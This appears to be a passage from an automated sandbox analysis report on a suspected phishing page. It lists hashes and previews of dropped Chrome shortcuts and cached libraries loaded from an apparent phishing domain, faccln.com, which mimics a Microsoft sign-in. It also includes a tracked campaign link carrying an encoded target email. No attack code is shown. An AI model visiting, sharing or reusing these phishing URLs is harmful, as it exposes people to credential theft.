                              • Excluded IPs from analysis (whitelisted): 172.253.124.94, 64.233.185.84, 74.125.138.139, 74.125.138.100, 74.125.138.102, 74.125.138.101, 74.125.138.138, 74.125.138.113, 34.104.35.123
                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=

                              Created / dropped Files

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 18 18:35:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.9973116371100494
                              Encrypted:false
                              SSDEEP:
                              MD5:8D42FEE088EDFA8AE64D237ED71684E9
                              SHA1:80FC0398CA804C926521DC79CDD3B42B623599EE
                              SHA-256:7E7119AABB1529AC3A999610AC48E25CDCD2361753358FEDF226C0F7177A50FF
                              SHA-512:C8D98B52731C82E1E3B5B3BA62881B9047AA2F9CECD1BCCB1E3437298E2A528A34EC7B4746D83744B8C320DBB5AA9794CFC729FE086A507F8F5D59B46CE46821
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xz.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xz.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xz............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X{............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 18 18:35:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2679
                              Entropy (8bit):4.013375754077048
                              Encrypted:false
                              SSDEEP:
                              MD5:E430321451E0F504E1265DC1973140DC
                              SHA1:0989BFA30692F28B3067512A33AEF2A2D32003D9
                              SHA-256:938767B314041C495BD736AE4AF39236A947E5377E37FBB84701409058B83BE5
                              SHA-512:800B5BBD93A7F1B5971A93C38EFC8E419F4A4C5D949814B65D470B00A6072323546E7C9FEB52104E91095FC8F3244AC6B10434186CBAE1CA88480AE6F87185D0
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....^.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xz.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xz.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xz............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X{............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2693
                              Entropy (8bit):4.01869487069322
                              Encrypted:false
                              SSDEEP:
                              MD5:402E8631F6534FF6E5D8F81CE0E48BA5
                              SHA1:F1CAFC89A9B271625FCD4D092E87C21166FB9D2C
                              SHA-256:946835582ADC5047800E4010D65234517C3AFA973A9FC3DB636A5D1222D9CCBE
                              SHA-512:3317B754FC5DD67F0EE7845F77D651ACF573A48E124E58E1529BE939E1BD6484FEEFF9EC6D98F9D106B6FEB856569BEC0D2AA8CABCF2756FCBDE2CD654FF9B4C
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xz.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xz.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xz............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 18 18:35:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2681
                              Entropy (8bit):4.008284265739954
                              Encrypted:false
                              SSDEEP:
                              MD5:00B720ED3944378A37D50F261B7CC99C
                              SHA1:3D987F1512BD793287C1422FF7E963DF234EB29D
                              SHA-256:A231C6149F7D812D57DD433A7AF0B8F136A44FB6AAD3F07C8BE731F854484D45
                              SHA-512:51D0D003A439A2A5AA622C3B18D5DEA403808B61EEBC5232BFB35C55A34AF2F242DFD8FC1A5B624592AD9545CB7C1BE52274B23013A3893DD834935A1E11A9FF
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....\.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xz.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xz.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xz............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X{............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 18 18:35:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2681
                              Entropy (8bit):3.998694918607435
                              Encrypted:false
                              SSDEEP:
                              MD5:8ABC36DCB1090056E5877E6CEA41A818
                              SHA1:B7E127F77A6C9788C3A4DC1B63B1E702FA2454D4
                              SHA-256:145C9AC5DFC09D573C7E60AAD3218CEE8DD96DA0E618EBACC8DFC2EF3DF380F1
                              SHA-512:7D380B953E4A2A6373668105ED0A5418110ABF57D7BB680CDD0A9C2997FE36646A4B37AD7ADF13C9271A8DE07490ACC9ACA00F94C1DA1E6E7D0EB6BDC7861B5C
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....8..........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xz.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xz.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xz............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X{............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 18 18:35:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2683
                              Entropy (8bit):4.012024697830826
                              Encrypted:false
                              SSDEEP:
                              MD5:349407F5229D1FAD3CA436E98DE61B75
                              SHA1:215E927C38F9880DBB6AF36B8E1A14191DB95708
                              SHA-256:2F80D36C293A6813EF3CE1FF7E888500597E1C838E067265B07A0A74E2CE6417
                              SHA-512:4BEB9E030FEEB78E7F118AE9B97C357600F2C0D318221420F124F703967CF82A3BCC84137FA65A823B96C04B2266C07B3D9F4BEB6689BF859035550E5957B8D8
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....J.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xz.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xz.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xz............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X{............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              Chrome Cache Entry: 80

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):105369
                              Entropy (8bit):5.240719144154261
                              Encrypted:false
                              SSDEEP:
                              MD5:8E6B0F88563F9C33F78BCE65CF287DF7
                              SHA1:EF7765CD2A7D64ED27DD7344702597AFF6F8C397
                              SHA-256:A7057BEBFFF43E7281CA31DA00D40BD88C8D02D1576B9C45891DD56A3853269A
                              SHA-512:7DCE31D45ACA40340490B9F437A22ADF212B049DE0D4DDEB908A50C1F5C6C7B5561323B3A93B6ED3E5A7C44D7170460BFF8D8722749191C0F5A8DBD83E093E7F
                              Malicious:false
                              Reputation:unknown
                              URL:https://faccln.com/APP-NUIG96/c491bc587d9cb76304772eac2f3b42356621765faad80
                              Preview:html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}

                              Chrome Cache Entry: 81

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 280 x 60, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):18875
                              Entropy (8bit):7.979119877740958
                              Encrypted:false
                              SSDEEP:
                              MD5:18D1D44875BFF459D4630F984C7DECB3
                              SHA1:010CABA8A7D528AF07EAEBC47870CAA795544A3E
                              SHA-256:AF830B56F46988806C5C63E0B22389F0D5855D152C5473B8E2B151680F2D944E
                              SHA-512:006573EDB9848280A994F7C0A875009145C39A070AE9801688952847E87A8AE9DBACB72EFCA561ED1EC235F2085682CFC86D5EB0CABB3C5D660D2F40A57A2E98
                              Malicious:false
                              Reputation:unknown
                              URL:https://aadcdn.msauthimages.net/dbd5a2dd-jovrdkvfwovzc2nip-hn27hreryk74cxefmq-cnbqrk/logintenantbranding/0/bannerlogo?ts=636020406978413531
                              Preview:.PNG........IHDR.......<............tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:82246D0C2F2F11E6A82487CFEB91F92B" xmpMM:DocumentID="xmp.did:82246D0D2F2F11E6A82487CFEB91F92B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82246D0A2F2F11E6A82487CFEB91F92B" stRef:documentID="xmp.did:82246D0B2F2F11E6A82487CFEB91F92B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.;b...F)IDATx.....Wy7...s{.{..".KV.e.F.e9rA.m....?.|.......B0...G.......;.m,..r.%..}UV.j......m...s..w....w.

                              Chrome Cache Entry: 82

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1420x1200, components 3
                              Category:dropped
                              Size (bytes):249496
                              Entropy (8bit):7.97720886613946
                              Encrypted:false
                              SSDEEP:
                              MD5:D339726BE8CC353D9CB73AF00387FF0E
                              SHA1:DB86C5EE2ADC81118B2B16424AF25A5F0FB2D8B0
                              SHA-256:0D957E78128173D0A7851319F9DA8173B622E92D4ADDD991EE5C88090A5A4662
                              SHA-512:4E0CA035328C32EB5FAC649D111EC5F9FEF8E394DBDE8B9E7B58D2166F15C91CD0E4964BC19F7077409DEC1E5BC4F385AFD8C9F25319A6C0C8BBEF1A77BC5222
                              Malicious:false
                              Reputation:unknown
                              Preview:......Exif..II*.................Ducky.......2.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:82246D142F2F11E6A82487CFEB91F92B" xmpMM:DocumentID="xmp.did:7C6C77B22F3011E6A82487CFEB91F92B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82246D122F2F11E6A82487CFEB91F92B" stRef:documentID="xmp.did:82246D132F2F11E6A82487CFEB91F92B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................................#"""#''''''''''.................................................

                              Chrome Cache Entry: 83

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                              Category:dropped
                              Size (bytes):61
                              Entropy (8bit):3.990210155325004
                              Encrypted:false
                              SSDEEP:
                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                              Chrome Cache Entry: 84

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (32065)
                              Category:downloaded
                              Size (bytes):85578
                              Entropy (8bit):5.366055229017455
                              Encrypted:false
                              SSDEEP:
                              MD5:2F6B11A7E914718E0290410E85366FE9
                              SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                              SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                              SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                              Malicious:false
                              Reputation:unknown
                              URL:https://faccln.com/jq/c491bc587d9cb76304772eac2f3b42356621765dca771
                              Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

                              Chrome Cache Entry: 87

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (41442)
                              Category:downloaded
                              Size (bytes):41481
                              Entropy (8bit):5.31009549751899
                              Encrypted:false
                              SSDEEP:
                              MD5:3B5B3D36FDE8FFE8ED76B1EFBFC65410
                              SHA1:D63107D0912FDB387530D5CE2D512C928D73D122
                              SHA-256:29D600462A30694EFD15B9848B4CA42D178CD067009275C35A30580121114304
                              SHA-512:3C96B7A1048B59107BC0767B190FE0FAACAFEABE266EE8668836FC06348567C359D9AE36A13B40AB99F4B9C580C1C403962900B64B9BFAD3D50B0E27A76ED60A
                              Malicious:false
                              Reputation:unknown
                              URL:https://unpkg.com/axios@1.6.8/dist/axios.min.js
                              Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).axios=t()}(this,(function(){"use strict";function e(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function t(t){for(var r=1;r<arguments.length;r++){var n=null!=arguments[r]?arguments[r]:{};r%2?e(Object(n),!0).forEach((function(e){c(t,e,n[e])})):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(n)):e(Object(n)).forEach((function(e){Object.defineProperty(t,e,Object.getOwnPropertyDescriptor(n,e))}))}return t}function r(){r=function(){return t};var e,t={},n=Object.prototype,o=n.hasOwnProperty,i=Object.defineProperty||function(e,t,r){e[t]=r.value},a="function"==typeof Symbol?Symbol:{},s=a.iterator||"@@

                              Chrome Cache Entry: 88

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 27 x 30, 8-bit/color RGB, non-interlaced
                              Category:downloaded
                              Size (bytes):61
                              Entropy (8bit):4.035372245524405
                              Encrypted:false
                              SSDEEP:
                              MD5:558C86316CCCD69B25A9C4DA0430C5F9
                              SHA1:ECA59F0A8367DC039AF6171F608147659B16CF96
                              SHA-256:D1A957ED5D1F09CA91F244FA4C7B2610031DC861DDFB3F80FB1701EB4681E427
                              SHA-512:4B71E997281AF98E5CFEE18229554DC770B3B9AC8BE7845BB7698C08E83F01CB97933C41B36D71401774C8D0D924C1100994A10B95599F70FAC72BE9F7D75E81
                              Malicious:false
                              Reputation:unknown
                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/876719d229a0b045/1713468958089/_1jHq-UHmtOpv-d
                              Preview:.PNG........IHDR.............R{.....IDAT.....$.....IEND.B`.

                              Chrome Cache Entry: 89

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (42414)
                              Category:downloaded
                              Size (bytes):42415
                              Entropy (8bit):5.374316408837108
                              Encrypted:false
                              SSDEEP:
                              MD5:374FEC8B5E50CD6AB980F3FEF21A5AA0
                              SHA1:7F474607991A19B6F1B78CC32E0F75B501B60774
                              SHA-256:8AF2DA74872F03E058AB79A584176D2086AFC01BBD42DD2ED14259179341BE6A
                              SHA-512:3420E0DEF4FA49BD8B67DA80F1C3F56A08B4892BC0373D7BB824F8126713B209116147D4B1E1D5E7B07C6DBC58B1AD411AEB2F5A0DAE99FFC220246311E3808E
                              Malicious:false
                              Reputation:unknown
                              URL:https://challenges.cloudflare.com/turnstile/v0/g/54ea73d52131/api.js?onload=lmgW1&render=explicit
                              Preview:"use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);function m(h){bt(s,o,u,m,b,"next",h)}function b(h){bt(s,o,u,m,b,"throw",h)}m(void 0)})}}function M(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):M(e,r)}function Ie(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ve(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),o.forEach(function(u){Ie(e,u,t[u])})}return e}function fr(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                              Chrome Cache Entry: 90

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (50758)
                              Category:downloaded
                              Size (bytes):51039
                              Entropy (8bit):5.247253437401007
                              Encrypted:false
                              SSDEEP:
                              MD5:67176C242E1BDC20603C878DEE836DF3
                              SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                              SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                              SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                              Malicious:false
                              Reputation:unknown
                              URL:https://faccln.com/boot/c491bc587d9cb76304772eac2f3b42356621765dca777
                              Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum

                              Chrome Cache Entry: 91

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:downloaded
                              Size (bytes):513
                              Entropy (8bit):4.720499940334011
                              Encrypted:false
                              SSDEEP:
